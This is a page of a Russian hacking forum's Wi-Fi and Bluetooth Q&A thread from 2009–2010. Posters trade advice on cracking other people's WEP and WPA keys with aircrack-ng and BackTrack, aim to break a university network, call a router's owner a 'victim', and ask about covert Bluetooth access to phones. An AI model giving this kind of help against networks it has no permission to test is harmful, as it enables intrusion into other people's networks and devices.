PDA

Просмотр полной версии : [Wi-Fi, BT] Задай вопрос - получи ответ!

Страницы : 1 2 3 4 5 6 7 8 9 [10] 11

fuckthesystem
24.10.2009, 00:47
кто знает, есть ли wi-fi сниффер для смартфонов(не кпк) или iphone?
в универе нужно сеть ломануть, а ноута нет

kingdom
24.10.2009, 04:30
знаюшие люди помогите.решил попробовать поснифить пакеты на своей точке,попрактиковаться немного,пользуюсь linux ubuntu, карточка D-LINK DWL G650 чип atheros все идет быстро и благополучно,после накопления 20 000 полезных пакетов,ключ всплывает за 9 сек,затем я приобрел специально под разъем внешней антенны карточку EDIMAX EW 7318 USG чип ralink,так вот што получается с етой картой,снифит пакеты так же удачно как и с D-LINK,но почему то на BSSID на MAC адрессе последние два знака совсем не такие как когда снифешь одну и ту же точку (то есть мою),картой D-LINK,to есть если настояший MAC моей точки 00:23:f8:8d:30:d2 то етой карточкой получается 00:23:f8:8d:30:90,я не пойму откуда он вобше берется етот адрес,я заходил в роутер сверял правильный адрес 00:23:f8:8d:30:d2, а в результате в то время как D-LINK хватало взломать ключик после сбора 20 000 пакетов,EDIMAX занимает на много больше времени и в конце всплывает TRY NEXT 25 000 IVS, и так до бесконечности,то есть пакетов мало даже после 60 000,кто нибудь может подсказать в чем дело.и почему ета карта выдает не верный адрес BSSID..

теща
24.10.2009, 04:33
бек трек4 слей .. с етим проблем нема :-)

kingdom
24.10.2009, 04:37
бек трек4 слей .. с етим проблем нема :-)

ты имеешь в виду воспользоваться БТ4?дело в том што я не силен в nix вых делах,попробовал загрузить БТ4 пре версия,она у меня не загружается.какие то пароли там или што то вроде етово требует,поетому мне проше было поставить убунту.

теща
24.10.2009, 04:40
ты имеешь в виду воспользоваться БТ4?дело в том што я не силен в nix вых делах,попробовал загрузить БТ4 пре версия,она у меня не загружается.какие то пароли там или што то вроде етово требует,поетому мне проше было поставить убунту.
5782семпять давай ломись я пока еще не сплю )

kingdom
24.10.2009, 06:58
на BT4 тоже самое происходит,ума не приложу што ето может быть

Deamon26
26.10.2009, 01:01
Как можно расшифровать полученный wep ключ.
CCBC90D9AO, я его пытался расшифровывать через аски II таблицу, но получается бред МЌРЩа или ¦-Р-а, при подключении нэта нет, что может быть? Заранее спасибо за ответ.

4ikotillo
28.10.2009, 01:39
Как можно расшифровать полученный wep ключ.
CCBC90D9AO, я его пытался расшифровывать через аски II таблицу, но получается бред МЌРЩа или ¦-Р-а, при подключении нэта нет, что может быть? Заранее спасибо за ответ.

Вполне возможно, что в этой сети нету интернета и все))) Попробуй зайти на роутер по дефолтным паролю и логину, проверить там. А ключ подходит и без расшифровки ;) Ты же получаешь ip? Если нет, попробуй подставить мак клиента.

4ikotillo
28.10.2009, 01:42
кто знает, есть ли wi-fi сниффер для смартфонов(не кпк) или iphone?
в универе нужно сеть ломануть, а ноута нет

Знаю точно, что есть aircrack-ng на iphone, ищи видео на youtube)))

axee
01.11.2009, 02:28
Я взломал точку, все пароль пишу но мне видает что сеть ограничено или отсутствует что это? раньше все норм было подключался

Zman
01.11.2009, 23:58
Привет всем. Интересует такой вопрос у меня дома анлим адисль и купил роутер длинк дир 300. Хочу раздавать нет соседям за определенную плату) Какое максимальное количество компов может сразу подключиться к нему? И как лучше настроить что бы не лазили все подряд. Кроме пароля еще поставить привязку по маку?

max1256
03.11.2009, 12:23
Начни с поиска по сайту или с гугля. слишком обширный вопрос задал и неконкретный.

Real!
04.11.2009, 01:27
Всем привет. Кто-нить брутил пиндосов? Дайте, плиз, ссылочку на путевый словарик. А то нашел хендшейк, пилил его 4-мя словарями 1,5 суток, и ничего.
И еще: скорость перебора 650-700 к/с, но если перекрыть окно консоли другим окном, то скорость возрастает до 1100-1200 к/с. Кто-нить знает почему?
P.S. Использую BT4.
P.P.S. Ногами не пинайте, 3 дня назад о линуксе я знал только то, что он есть. )))

Real!
04.11.2009, 01:42
Да, еще вопрос. Есть АР, от которой есть ключик. Но инет там полное г... Есть подозрения, что он подрезан специально. Можно ли как-нить это поправить?
АР Cisco. Дайте плиз ссылочки.

Robert007
08.11.2009, 01:36
Пытаюсь взломать WPA2, при мониторинге деавтаризация не помогает,оставлял на ночь,клиент выходил и заходил при мне - ключ не получен.Сигнал 88 пакетов набрало 400000, почему не получаеться?может сигнал слабый?

yojik
11.11.2009, 17:37
Vsem privet. Kto mojet mne pomo4 ispolizovati aircrack pod Windows Vista tak kak zahodea v temu aircrack for windows - NI4EGO poleznogo ne nashol a peek draivera avtor vilajil toliko dlea svoei karto4ki.
Karo4e: U menia Windows Vista. Wifi adapter Belkin F5D7050 (v spiske podderjivaemih)
Podskajite kak eto dobro krasivo nastroiti shtob vseo rabotalo..........................
Zaranee spasibo............

NC22
13.11.2009, 13:23
помогите со взломом WPE.
через commview пакеты идут но даже 100000 пакетов даты собрать просто нереально долго будет. С трудном 1к набрался за день. Т.к. пакеты идут только когда юзеры в сети.
Через airowizard пакеты data не идут вообще. Как узнать там аутентификация прошла или не прошла ? окошко с ней просто закрывается и все. потом пытаюсь словить хоть один пакет в ней для инъекции но проходит время но не какой реакции.

NC22
13.11.2009, 15:28
Короче говоря уже понятно что дело в том что почему то не отправляются флудовые аутентификационные запросы. Есть ли аналоговые проги для их отправки или можно еще какой способ попробовать ? (ноут Asus EEEPC 900 , wifi карточка Atheros AR5007EG)

boykent
13.11.2009, 20:31
Привет всем!кто подскажет возможен ли вардрайвинг вот с этой картачкой Intel(R) WiFi Link 5100 ABG ? в списке адаптеров смотрел,но не увидел,может проглядел.....

rost73
14.11.2009, 23:54
Прошу совет!
есть взломанные сети с шифрованием wep ;) ,без проблем захожу в интерфейс роутера жертвы. При подключении к точке,
подключение ограничено! доступа в интернет нет. До сих пор все работало, потом несколько раз выдало о конфликте IP адресов...и все!
Настройки роутера жертвы IP динамический, DHCP включен.
блокировок по макУ и IP нет...все открыто.
Могу заходить изменить сеть на открытую без шифрования...проблему с инетом не решает :confused:

smala
15.11.2009, 11:21
Здрасте. Хочу создать сеть через вай фай. У меня есть ноут с адаптером Intel(R) PRO/Wireless 3945ABG . Я хочу создать сеть, после подключения к которой подкл пользователь мог через браузер зайти на сайт(которий находитса на виртуальном хостинге при помощи апатч). Можете помочь?

Roston
17.11.2009, 03:35
А wi-fi маршрутизатор у тебя какой?

nvie89
18.11.2009, 23:22
Здравствуйте!
после запуска airoscript:

root@xander-laptop:/# airoscript
Text domain dir is /usr/local/share/locale and textdomain is airoscript
[INFO] Output folder is /tmp/tmp.lawhx30786
Select screen resolution

____Available resolutions_____
## ##
## 1) 640x480 ##
## 2) 800x480 ##
## 3) 800x600 ##
## 4) 1024x768 ##
## 5) 1280x768 ##
## 6) 1280x1024 ##
## 7) 1600x1200 ##
##__________________________##
Option: 2
Using configured terminal (xterm)
Im going to set terminal options for your terminal now...done

_____Interface selection_____
1) eth0
2) eth1
Select your interface: 2

Should I put it in monitor mode? (Y/n) y

Interface used is : enabled
Interface type is : withPID (19888)

Do you want to use airserv-ng? [y/N] y
Start a local server? [y/N] y
Checking mac address...done/usr/local/share/airoscript/airoscfunc.sh: line 1555: /usr/local/bin/macchanger: No such file or directory

||
||
\/
## 2) Change MAC to CLIENTMAC ##
## 3) Manual Mac input ##
##_________________________________##
Option: 1
Unknow way to change mac

_________________Menu________________
## Select next action ##
## 1) Scan - Scan for target ##
## 2) Select - Select target ##
## 3) Attack - Attack target ##
## 4) Crack - Get target key ##
## 5) Fakeauth- Auth with target ##
## 6) Deauth - Deauth from target ##
## 7) Others - Various utilities ##
## 8) Inject - Jump to inj. menu ##
## 9) Auto - Does 1,2 and 3 ##
## 10) Exit - Quits ##
##__________________________________##

1) 1 3) 3 5) 5 7) 7 9) 9 11) 11
2) 2 4) 4 6) 6 8) 8 10) 10 12) 12
Select your interface: 1
____________Encryption_______________
## Select AP specification ##
## ##
## 1) No filter ##
## 2) OPN (open) ##
## 3) WEP ##
## 4) WPA ##
## 5) WPA1 ##
## 6) WPA2 ##
## 7) Return to main menu ##
Option number: 3

||
||
\/
______________Channel________________
## Select channel to use ##
## ##
## 1) Channel Hopping ##
## 2) Specific channel(s) ##
Option number:1

после чего он в другом окне счастливо мне пишет вот это:

xterm: Can't execvp /usr/local/sbin/airdump-ng: No such file or directory
root@xander-laptop:/tmp/tmp.lawhx30786#

что касается airodump-ng, то он у меня установлен, но при вводе команды

airodump-ng -c 6 -w wep -i eth1
Invalid output format: IVS and PCAP format cannot be used together.

root@xander-laptop:~# airodump-ng -c 6 eth1
ioctl(SIOCSIWMODE) failed: Invalid argument

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run 'airmon-ng start eth1 <#>'
Sysfs injection support was not found either.

Карточка у меня Broadcom .... airmon-ng:

root@xander-laptop:~# airmon-ng

Interface Chipset Driver

eth1 Unknown wl

Люди, подскажите, что не так?

Life.
19.11.2009, 02:37
Есть ли программа для блютуз соединения без ведома владельца?

denikos
20.11.2009, 10:08
Всех приветствую! У меня есть ТД TP-LINK WA501G и обычный комп. Вопрос: Могу ли я с ее помощью подключиться к Wi-Fi сети? В характеристиках ТД написано, что она может выступать в роли клиента. При этом просит указать имя и МАС-адрес устройства к которому желаем подключиться. при нажатии кнопки "Поиск сети" находит нужную нам сеть, но на кнопку подключить не реагирует, т.е. ничего больше не происходит.

4ikotillo
20.11.2009, 23:09
Всех приветствую! У меня есть ТД TP-LINK WA501G и обычный комп. Вопрос: Могу ли я с ее помощью подключиться к Wi-Fi сети? В характеристиках ТД написано, что она может выступать в роли клиента. При этом просит указать имя и МАС-адрес устройства к которому желаем подключиться. при нажатии кнопки "Поиск сети" находит нужную нам сеть, но на кнопку подключить не реагирует, т.е. ничего больше не происходит.

Возьми другую точку и попробуй поэкспериментировать с расстоянием, поищи мануалы.

Roston
21.11.2009, 18:50
Чисто теоретический вопрос.
Есть у меня собственный ви-фи роутер D-Link DIR-400
На нём можна проводить експеременты с проникновением? Или это будет бред.
з.ы. На ноуте стоит стандартный адаптер, Asus 802.11 g

Driver23
23.11.2009, 14:51
Добрый день, господа Античатовцы! Подскажите плз решение, ответ на следующий вопрос:

Дано: есть маршрутизатор - который раздает кабельный WAN инет по воздуху...Настройки были по дефолту..к нему по воздуху подключены 2 ноута и 1 стационраник с FreeBSD и один Wifi принт-сервер...

При настройке принт-сервера - в инструкции было сказано..что нужно перевести его в режим Infrastructure - чтобы ноутбуки выходили на него через роутер ( иначе пришлось бы разъединстя с сеткой с инетом и соединятся с сеткой принтсервера для того чтобы напечатать что либо) при задании всех настройек принт сервер в режиме Infrastructure отлично встал и стал работть...

В каком режиме настроить FreeBSD комп, для простого соединения с точкой досутпа роутера и возможностью видимости со всех устройств в сети через роутер?

Как я понял : 2 ноутбука фунциклируют в режиме Adhoc? Принт-серевер в Infrastructure , a freeBSD тоже подключать как Adhoc??? в логе роутера видно Mode: AP ( asus wl520gc)

Подскажите еще - режимы Adhoc, Infrastructure и AP это из одной и той же оперы?

DrakonSerg
23.11.2009, 21:56
Подскажите, пожалуйста, более менее нормальный сканер сетей под Windows. В гугле не нашел. Мне нужно, чтобы он показывал не только название сети (много таких сканеров) а и способ шифрования, мак адрес точек и тд. Есть ли такие?

denikos
24.11.2009, 08:09
Подскажите, пожалуйста, более менее нормальный сканер сетей под Windows. В гугле не нашел. Мне нужно, чтобы он показывал не только название сети (много таких сканеров) а и способ шифрования, мак адрес точек и тд. Есть ли такие?
CommView for Wi-Fi

smala
29.11.2009, 17:54
Здрасте помогите настроить сервер ФАЙФАЙ

9822
02.12.2009, 15:52
Alexsize
подскажи пожалуйста

вот весь софт для лома блутузу пишется для мобил там JAVA,

но у меня есть ноутбук не подскажешь софт для подбора пароля к блутузу
как узнаю пасс к блутузу смогу через софт зайти с лептопа на мобилу и проанализировать все

вот софт для мобил которые там ставятся это BT-Info-1.08,Super-Bluetooth
а есть чтонибуть для ноутбука?

удаленное упровления мобилой с ноутбука

(для безапастности интерестно как все работает)

Luxar
04.12.2009, 02:33
Какие есть ручные сканеры WLAN? А то рыскать с ноутом на перевес в поисках AP уже хребет болит :mad:
Уже запарился гуглить, а находит только один девайс и тот 2003 года http://net.compulenta.ru/37258/

F4R
04.12.2009, 17:20
что касается airodump-ng, то он у меня установлен, но при вводе команды

airodump-ng -c 6 -w wep -i eth1
Invalid output format: IVS and PCAP format cannot be used together.

root@xander-laptop:~# airodump-ng -c 6 eth1
ioctl(SIOCSIWMODE) failed: Invalid argument

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run 'airmon-ng start eth1 <#>'
Sysfs injection support was not found either.

перед этим выполни airmon-ng start eth1

sergey_allll
05.12.2009, 20:13
Какие есть ручные сканеры WLAN? А то рыскать с ноутом на перевес в поисках AP уже хребет болит :mad:
Уже запарился гуглить, а находит только один девайс и тот 2003 года http://net.compulenta.ru/37258/

Хороший ручной сканер это телефон nokia n82 с установленной программой wi-fi сканера " Barbelo".

ronald
06.12.2009, 18:53
подскажите пожалуйста как сделать/где скачать словарь для aircrack
ОС-Ubuntu

autor
06.12.2009, 19:51
Вот один из способов взлома в WINDOWS:
Тут программа для взлома:
http://depositfiles.com/files/py6pfajop

Тут видео как взламывать:
http://depositfiles.com/files/ssp6iam8b

Jey
08.12.2009, 13:46
У меня следущая ситуация, получил пороль от точки доступа с помощью aircrack-ng
Но подключится немогу, пишет подключение отсуцтвует или ограничено.
IP и маску автоматически получает но ответа от точки нет, полученных пакетов 0.
Есть какой нибуть снифер который бы собрал пакеты по типу airdumpa и четко расписал что DNS такойто, маска такаято и тд. Посмотрел в kismet клиентов, поменял мак на одного из них, непомогло.

sergey_allll
08.12.2009, 18:19
Есть какой нибуть снифер который бы собрал пакеты по типу airdumpa и четко расписал что DNS такойто, маска такаято и тд. Посмотрел в kismet клиентов, поменял мак на одного из них, непомогло.

Запускаешь в BT4 программу Wireshark в настройках прописываешь полученый пороль. Ловишь пакеты, выставляешь фильтрацию по ip. Смотришь ip диапазон сети.

Jey
08.12.2009, 23:18
Запускаешь в BT4 программу Wireshark в настройках прописываешь полученый пороль. Ловишь пакеты, выставляешь фильтрацию по ip. Смотришь ip диапазон сети.
А можно поподробней, куда именно прописывать пароль, я этой программе скармливал cap файл там куча ip тока ниодин не подходит )

sergey_allll
09.12.2009, 04:15
А можно поподробней, куда именно прописывать пароль, я этой программе скармливал cap файл там куча ip тока ниодин не подходит )

Собираем пакеты точки в cap файл без инжекции и скармливаем их Wireshark.
Прописываем пароль: edit prefernces-Protocols-IEEE802.11 включаем Enable decryption и прописываем пароль как показано на примере.
Смотрим внутрисетевые ip и выставляем в карте.

konstantin.21
09.12.2009, 17:31
карточка edimax ew-7318usg и BT3

проблема в том что не переклюсаются каналы! т.е. я указываю на каком канале должна работать карточка....

airmon-ng start rausb0 5
iwconfig

или

iwconfig rausb0 channel 5

Jey
11.12.2009, 16:29
С IP разобрался, там от 192.168.1.1 до 192.168.1.225, Просканил сеть LanScope (из под винды) Сменил мак и IP на одного из пользователей, инета так и не появилось, походу нужен правильный адрес шлюза и DNS, у кого нибуть есть мысли как их узнать ?

sergey_allll
11.12.2009, 18:19
С IP разобрался, там от 192.168.1.1 до 192.168.1.225, Просканил сеть LanScope (из под винды) Сменил мак и IP на одного из пользователей, инета так и не появилось, походу нужен правильный адрес шлюза и DNS, у кого нибуть есть мысли как их узнать ?

Если в сети трафик не шифруется то поробуй программой cain & abel прога классная!

user_bad
14.12.2009, 14:28
так сетка может как транспорт для впн используется

loc
15.12.2009, 11:17
Извиняюсь, если не туда... но.. пара вопросов насчет wi-fi:
1) Как эмулировать точку доступа PCI wi-fi адаптер D-link DWL-G520 (вроде он так называется...)? Какие сторонние драйвера/софт использовать для этого?!
2) Возможно ли с помощью этой карты сканировать эфир?!
Заранее Спасибо! :)

sajgon
17.12.2009, 04:06
всем приветы...
подружил usb wi-fi адаптер с банкой, по схеме что нагуглил и с помощью search for wireless devices на ноуте нашел свободную точку.
вопрос: нужно определить место нахождение точки доступа WI-FI(под каким углом от меня) и расстояние до нее. как ето сделать?есть ли прога?!

4ikotillo
17.12.2009, 06:56
всем приветы...
подружил usb wi-fi адаптер с банкой, по схеме что нагуглил и с помощью search for wireless devices на ноуте нашел свободную точку.
вопрос: нужно определить место нахождение точки доступа WI-FI(под каким углом от меня) и расстояние до нее. как ето сделать?есть ли прога?!

Без спец оборудования сложно, но можешь включить программу NetStumbler, прогуляться и сделать выводы, идеальный вариант еще и направленную антенну для этого использовать, тогда можно фактически узнать где точка.

4ikotillo
17.12.2009, 07:08
1) Как эмулировать точку доступа PCI wi-fi адаптер D-link DWL-G520 (вроде он так называется...)? Какие сторонние драйвера/софт использовать для этого?!

1) Возможно это только под *nix системами http://otvety.google.ru/otvety/thread?tid=454fca7722e0dae1

Альтернатива конечно есть))) У тебя может стоять 2 вида чипсетов Atheros или Ralink. Если Atheros то только под *nix, а если Кф link делай через SoftAP под виндой на свой страх и риск:

http://www.lan23.ru/forum/showthread.php?p=21751

http://www.pspx.ru/forum/showthread.php?t=80689

2) Да, это же Atheros(Ralink) windows - Commview, NetStumbler.Но нужны специальные драйвера, CommView все установит.
Или же BackTrack тебе в руки)))

loc
19.12.2009, 11:20
1) Возможно это только под *nix системами http://otvety.google.ru/otvety/thread?tid=454fca7722e0dae1

Альтернатива конечно есть))) У тебя может стоять 2 вида чипсетов Atheros или Ralink. Если Atheros то только под *nix, а если Кф link делай через SoftAP под виндой на свой страх и риск:

http://www.lan23.ru/forum/showthread.php?p=21751

http://www.pspx.ru/forum/showthread.php?t=80689

2) Да, это же Atheros(Ralink) windows - Commview, NetStumbler.Но нужны специальные драйвера, CommView все установит.
Или же BackTrack тебе в руки)))

Спасибо.)
1) Вот только никак не могу найти модифицированные дрова от Ralink для своей карточки :(:(
2) Тут насколько я понимаю опять же нужны драйвера...(((

4ikotillo
19.12.2009, 20:17
Спасибо.)
1) Вот только никак не могу найти модифицированные дрова от Ralink для своей карточки :(:(
2) Тут насколько я понимаю опять же нужны драйвера...(((

1) Погугли по внимательней.
2) Программа CommView сама все драйвера установит, свои не родные.

loc
20.12.2009, 18:18
1) Погугли по внимательней.
2) Программа CommView сама все драйвера установит, свои не родные.
Насчёт программы.. Есть ли инструкция для новичков на неё?! Или тут все вопросы задавать?! ) :)

Semby68
22.12.2009, 01:13

Можно, скачай бак-трак и сканируй эфмр как угодно,в нём есть все дрова и под разные карты !!!
Описание и скачка /// http://qiq.ru/29/07/2009/unix_linux_soft/170167/backtrack_4_pre_rc.html

4tnight
29.12.2009, 19:46
В ветке "Список Wi-Fi адаптеров пригодных для Wardriving'а" ответа не нашел. Задам здесь свой вопрос. Имеется встроенная в ноут MiniPCI карта на базе чипсета Ralink rt2860. Подойдет ли она для Wardriving'а? Какие дрова нужны если да и где их взять? Стоит Винда ХР.

4ikotillo
30.12.2009, 16:10
В ветке "Список Wi-Fi адаптеров пригодных для Wardriving'а" ответа не нашел. Задам здесь свой вопрос. Имеется встроенная в ноут MiniPCI карта на базе чипсета Ralink rt2860. Подойдет ли она для Wardriving'а? Какие дрова нужны если да и где их взять? Стоит Винда ХР.

Читай форум и сообщение выше. Лучше backtrack.....

4tnight
30.12.2009, 19:09
Читай форум и сообщение выше. Лучше backtrack.....
О! Хоть ты ответил)) BackTrack несомненно лучше. Но не буду его ставить. Причины отпустим. Вопрос про Винду. На форуме ничего не нашел по своему вопросу. Усб карточки не стану покупать) Что делать? ))))
P.S. С НОВЫМ ГОДОМ ВСЕХ!!!!! )))))

Sw1tchBack
31.12.2009, 01:44
Можно ли брутить wifi точку с помощью aircrack и Realtek RTL8199 802.11b/g ?
Когда пробую взламывать с помощью airdump пишет The selected adapter's driver is not compatible with the PEEK protocol. See the aircrack documentation for more ifrormation on how to install a compatible driver.
В описании не нашел своей карточки :( И не нашел ссылки на скачивание нужных дров.

Semby68
02.01.2010, 11:41
Можно ли брутить wifi точку с помощью aircrack и Realtek RTL8199 802.11b/g ?
Когда пробую взламывать с помощью airdump пишет The selected adapter's driver is not compatible with the PEEK protocol. See the aircrack documentation for more ifrormation on how to install a compatible driver.
В описании не нашел своей карточки :( И не нашел ссылки на скачивание нужных дров.

Сперва надо перевести wifi карту в режим мониторинга,это в Back Track

нам надо узнать какой у нас интерфейс....у нашей сетевой карты....это можно узнать через консоль

Набрав команду airmon-ng

Когда мы узнали какой у нашей сетевой карты интерфейс(у каждого он может быть разный ...подставляйте свой) мы запускаем его в режим мониторинга это нужно для того чтобы сетевая карта могла быстрее собирать пакеты передаваемые сетью.
Делается это командой airmon-ng start eth0

Всё сетевую карту мы подготовили.
Теперь нам надо узнать что вообще за сети сейчас присутствуют и какие виды защиты они используют.
для этого мы в той же консоли прописываем команду airodump-ng eth0

hdn
02.01.2010, 12:59
мужики помогите, ноут asus s101h пытаюсь менять МАК на wifi он меняется но после этого немогу подключиться ни к одной точке доступа даже к своей, пишет что то навроде вы не в зоне действия сети попробуйте обновить список (менял в свойствах адаптера и специальными прогами такая же фигня), фильтрации по МАКам на точках нет, что это может быть? можеть есть какая нибудь хитрость? это всё под Вин. В Линухе подключаться к точке пробовал даже с реальным маком но неполучается

guyshka
03.01.2010, 21:15
Помогите пожалуйста определиться с карточкой, какую из них лучше взять, а то вроде бы все ниче так, а всё-равно сложно определиться
Alfa AWUS036H
Rosewill Senao Ralink RT2870 Chipset
SENAO NL-2511CD PLUS EXT2
Orinoco Classic GOLD Lucent Proxim 8410-WD
Atheros AR5006XS Mini-PCI

Заранее спасибо!

4tnight
04.01.2010, 13:34
Поставил BT3 на флешку. Всё равно не видит мою карточку( Что делать????

Semby68
04.01.2010, 22:33
Помогите пожалуйста определиться с карточкой, какую из них лучше взять, а то вроде бы все ниче так, а всё-равно сложно определиться
Alfa AWUS036H
Rosewill Senao Ralink RT2870 Chipset
SENAO NL-2511CD PLUS EXT2
Orinoco Classic GOLD Lucent Proxim 8410-WD
Atheros AR5006XS Mini-PCI

Заранее спасибо!

Думаю что , Alfa AWUS036H , у меня тожё Alfa AWUS036H , не жалею ,что взял ,но у меня на 1000 mW нормально пашет, но я с ним работаю в Bfck Tracke-4

Semby68
04.01.2010, 22:37
Поставил BT3 на флешку. Всё равно не видит мою карточку( Что делать????
Попробуй Bak-4 , у меня все wifi что имею работают !!!

4tnight
05.01.2010, 00:42
Попробуй Bak-4 , у меня все wifi что имею работают !!!
Так и сделаю. Тока дистр нада качнуть(

aleksis_64
05.01.2010, 02:15
Доброго времени суток.Подскажите кто знает как подключиться к открытой сети wi-fi с помощью NanoStation2 loco в режиме клиента.Конкретно,интересу ет последовательнось шагов в настройках AirOS.Я не специалист в этой области,но нужда возникла.Помогите пожалуйста.

guyshka
05.01.2010, 04:24
Думаю что , Alfa AWUS036H , у меня тожё Alfa AWUS036H , не жалею ,что взял ,но у меня на 1000 mW нормально пашет, но я с ним работаю в Bfck Tracke-4

Спасибо еще раз, а то переехали, сети есть, а сигнал слабоват с моим д линк, вот и решил обновить оборудование.

oldsys
05.01.2010, 14:08
Ответьте для уточнения !
1. Каждая Wi-fi точка выпускается с конвейера с индивидуальным Ип ?
2. По идеи если у Wi-fi Ip: xx.xxx.xxxx а у Пк (То есть источник интернета) Ip: yy.yyy.yyyy то доступа в интернет через Wi-fi не будет ?
3. Если Ип на Пк не совпадает с Ип Wi-fi будет ли возможность раздать интернет на других пользователей ?

А если не понятно объяснил ситуацию... У меня Ip выдан провайдером а wi-fi точка куплена в магазине.
Как я понял если в Wi-fi имеет свой Ип тогда мне надо иметь Ип (Тот что на Пк) в точьности такой как на wi-fi ???

З.ы. если нужны одинаковые Ip-ники . Тогда возможно ли пере прошить wi-fi !??
( Ответ типа : "Позвони своему провайдеру и по проси тот Ип который на Wi-fi !" Отпадает, они отказываются подключать Wi-fi на прежних условиях договора. Короче без лимит мой пропадёт ! )

За ранее спасибо !

777DEMYAN777
05.01.2010, 17:17
Подключаюсь к WI FI точке, в браузере ввожу IP точки и мне выводится окно с запросом логина и пароля, что нужно проделать чтобы узнать этот логин и пароль?

Примечание: Внизу пишет красными буквами что "Пароль будет передан незашифрованным"

sergey_allll
05.01.2010, 20:03
Подключаюсь к WI FI точке, в браузере ввожу IP точки и мне выводится окно с запросом логина и пароля, что нужно проделать чтобы узнать этот логин и пароль?

Для начала по маку определи что за точка доступа а затем в google посмотри на неё пароли по дефолту может и проканает.

sergey_allll
05.01.2010, 20:53
Ответьте для уточнения !
1. Каждая Wi-fi точка выпускается с конвейера с индивидуальным Ип ?
2. По идеи если у Wi-fi Ip: xx.xxx.xxxx а у Пк (То есть источник интернета) Ip: yy.yyy.yyyy то доступа в интернет через Wi-fi не будет ?
3. Если Ип на Пк не совпадает с Ип Wi-fi будет ли возможность раздать интернет на других пользователей ?

А если не понятно объяснил ситуацию... У меня Ip выдан провайдером а wi-fi точка куплена в магазине.
Как я понял если в Wi-fi имеет свой Ип тогда мне надо иметь Ип (Тот что на Пк) в точьности такой как на wi-fi ???

З.ы. если нужны одинаковые Ip-ники . Тогда возможно ли пере прошить wi-fi !??
( Ответ типа : "Позвони своему провайдеру и по проси тот Ип который на Wi-fi !" Отпадает, они отказываются подключать Wi-fi на прежних условиях договора. Короче без лимит мой пропадёт ! )

За ранее спасибо !

Вы наверно путаете ip с маком. А вобще попробуйте поставьте в комп вторую сетевую карту и к ней подключите точку доступа. А между ними сделайте подключение типа мост, должно работать .

werta
05.01.2010, 21:02
Всем доброго времени суток. Сталкунлся с такой проблемой. Купил вай фай модуль D-Link DWA-110.
Как и было сказано в одной из тем выпаял микросхему и установилR-Link драйвера. Девайс нашелся НО...
Не могу сделать сеть между двумя компьютерами Ad-Hoc. В системном трее висит крестик(дисконект).
Если не трудно помогите пожалуйста разобраться.
Профиль создал, SSID указал, что за сеть тоже...
при сканировании не находит :(

oldsys
05.01.2010, 22:42
Спасибо я так и думал но увы это уже будет кабельный интернет а мне нужен беспроводной !!! А на счёт IP возможно я что то путаю. Но под Wi-fi есть наклеена бумажка где указан IP xx.xxx.xxxx и Логин с паролем ( Вот только как это тогда понять )

З.ы. Wi-fi класса "TL-WR340GD"

Lens
05.01.2010, 23:43
Требуется помощь.Скачал BackTrack, но он не видит адаптер. Использую нетбук Dell Inspiron mini 1011, сетевая плата Dell Wireless 1397 WLAN Mini-Card. Реально ли вообще ломать на ней WEP или WPA, если да, то где взять дрова? Заранее благодарю.
ОС Windows XP Home Edition / BackTrack 3 USB Version

guyshka
08.01.2010, 16:42
Появилься вопросик... Вот пишут, что нвидиа повышает перебор паролей в секунду, а как сделать, чтобы она активно учавствовала в этом переборе?

И еще airowizard не хочет запускаться, пишет ошибку,
REGDB_E_CLASSNOTREG(0x80040154). и не знаю что с этим делать, и переустанавливал framework... А на другом пашет, только прохо что там нет pcmcia входа :(

GenaD
09.01.2010, 01:25
существует вообще какой нибуть софт для вардрайвинга Intel(R) WiFi Link 5100???

[Life]
09.01.2010, 02:47
существует вообще какой нибуть софт для вардрайвинга Intel(R) WiFi Link 5100???

сам искал ненашол...

больше всего что нету....

sergey_allll
09.01.2010, 20:30
Всем доброго времени суток. Сталкунлся с такой проблемой. Купил вай фай модуль D-Link DWA-110.
Как и было сказано в одной из тем выпаял микросхему и установилR-Link драйвера. Девайс нашелся НО...
Не могу сделать сеть между двумя компьютерами Ad-Hoc. В системном трее висит крестик(дисконект).
Если не трудно помогите пожалуйста разобраться.
Профиль создал, SSID указал, что за сеть тоже...
при сканировании не находит :(

Никаких микросхем в нём не отпаивал, мак меняется в ВТ4 предфинальной и Windows XP без проблем. Под Windows XP используй как точку доступа есть специальный софт, скорость линка составляет 2,9 мегабайта в сек. при сигнале 100 %.

ilya107
11.01.2010, 15:46
попробовал bluetrack 4, не увидел карточку wifi в моем 1000h(rt2860?)
Что делать?

4tnight
11.01.2010, 16:42
Что делать?
Наверное только покупать внешний. :mad: У меня тоже такой же чипсет rt2860. В BT3 не получилось. Попробую на днях в BT4. Но судя по твоему посту у меня ничего не выйдет :( Как только протестирую отпишусь тут.

ilya107
11.01.2010, 17:12
ок
я собственно попробовал bt3, не получилось, и попробовал компитьнуть дрова с сайта(в 4ке), тоже не прокатило(

terance
13.01.2010, 15:51
сть карточка ASUS WL-167G. На сайте aircrack-ng нашел ,что эта прога работает с этой карточкой тока из - под линя.Линь мне не охота ставить ,поэтому возникает вопрос : как настроить wi-fi адаптер для работы из-под венды с aircrack-ng?

спасибо за ответы!

4ikotillo
15.01.2010, 01:13
сть карточка ASUS WL-167G. На сайте aircrack-ng нашел ,что эта прога работает с этой карточкой тока из - под линя.Линь мне не охота ставить ,поэтому возникает вопрос : как настроить wi-fi адаптер для работы из-под венды с aircrack-ng?

спасибо за ответы!

Меня это начинает улыбать))) Ну флаг тебе в руки - ищи дрова(может от commview подойдут))))

4ikotillo
15.01.2010, 01:15
Что делать? А он и не увидит, это их стандартная проблема)))

ладно, шучу, вот решение твоей проблемы:
http://forum.eeeuser.com/viewtopic.php?id=36223

I have a 1000h and have backtrack 3 fully operational.

i had issues with sound and wireless, you need to grab the latest drivers from ralink
and remember if you are looking at tutorials for 'testing' wireless with aircrack etc
you dont use mad-wifi and ath0 with the 1000H, its ra0

the most common problem people are having is still referring to the wifi card as ath0 its not a atheros chipset in 1000h its ralink.

I had issues installing the compiz install from usb, so i went with VESA VGA option works great.

let me know if you have any questions, I dont really know where to begin it was a lot of stuffing about to get it all working

Серёжа393
17.01.2010, 14:19
Здрасте. Я в хаке wifi не ламер. мой прошлый nick - _SEREGA_.
